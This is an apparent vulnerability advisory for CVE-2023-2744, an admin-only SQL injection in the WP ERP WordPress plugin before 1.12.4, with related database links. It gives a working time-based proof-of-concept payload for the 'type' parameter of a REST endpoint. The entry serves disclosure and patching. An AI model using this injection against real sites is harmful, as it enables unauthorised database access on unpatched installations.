Lucene search
ArvandyWPEX-ID:435DA8A1-9955-46D7-A508-B5738259E731HistoryJun 05, 2023 - 12:00 a.m.
WP ERP < 1.12.4 - Admin+ SQL Injection
2023-06-0500:00:00
Arvandy
73
wordpress
erp
sql injection
admin
vulnerability
exploit
EPSS
0.002
Percentile
52.0%
The plugin does not properly sanitise and escape the type parameter in the erp/v1/accounting/v1/people REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
Sign in as an admin. In WP Admin, run the following code in the browser console, and notice that it takes several seconds to complete, demonstrating the SQL Injection vulnerability.
await wp.apiRequest({path: `/erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+(SELECT+SLEEP(3))x)+AND+('x'%3d'x`});Related
wpvulndb
wpvulndb
WP ERP < 1.12.4 - Admin+ SQL Injection
2023-06-05 00:00:00
prion
prion
Sql injection
2023-06-27 14:15:00
zdt
zdt
WordPress WP ERP 1.12.2 SQL Injection Vulnerability
2023-10-16 00:00:00
packetstorm
packetstorm
WordPress WP ERP 1.12.2 SQL Injection
2023-10-16 00:00:00
cvelist
cvelist
CVE-2023-2744 WP ERP < 1.12.4 - Admin+ SQL Injection
2023-06-27 13:17:11
nvd
nvd
CVE-2023-2744
2023-06-27 14:15:11
cve
cve
CVE-2023-2744
2023-06-27 14:15:11
githubexploit
githubexploit
Exploit for CVE-2023-2744
2023-12-31 07:27:17